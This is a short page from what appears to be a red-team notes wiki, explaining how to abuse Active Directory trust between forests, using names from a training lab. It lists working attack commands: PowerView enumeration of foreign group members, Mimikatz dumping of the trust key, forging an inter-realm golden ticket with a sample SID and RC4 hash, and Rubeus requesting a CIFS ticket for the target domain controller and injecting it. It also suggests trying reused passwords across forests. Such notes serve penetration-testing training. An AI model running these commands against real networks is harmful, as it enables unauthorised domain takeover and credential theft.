Abusing inter-forest trust

Since a forest is a security boundary, we can only access domain services that have been shared with the domain we have compromised (our source domain). Use e.g. BloodHound to look for users that have an account (with the same username) in both forests and try password re-use. Additionally, we can use BloodHound or PowerView to hunt for foreign group memberships between forests. The PowerView command:

Get-DomainForeignGroupMember -domain targetdomain.com

To impersonate a user from our source domain to access services in a foreign domain, we can do the following.

Obtaining the domain trust key:

Invoke-Mimikatz -Command '"lsadump::trust /patch"'

Use Mimikatz to generate a TGT for the target domain using the trust key:

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:60ec884517101aaa20f0fe574dde8eda /service:krbtgt /target:eurocorp.local /ticket:trust.kirbi"'

Then, use Rubeus to ask a TGS for e.g. the CIFS service on the target DC using this TGT.

.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorpdc.eurocorp.local /ptt

PreviousEscalating from child to parent domain NextWSUS server abuse

Last updated 2 years ago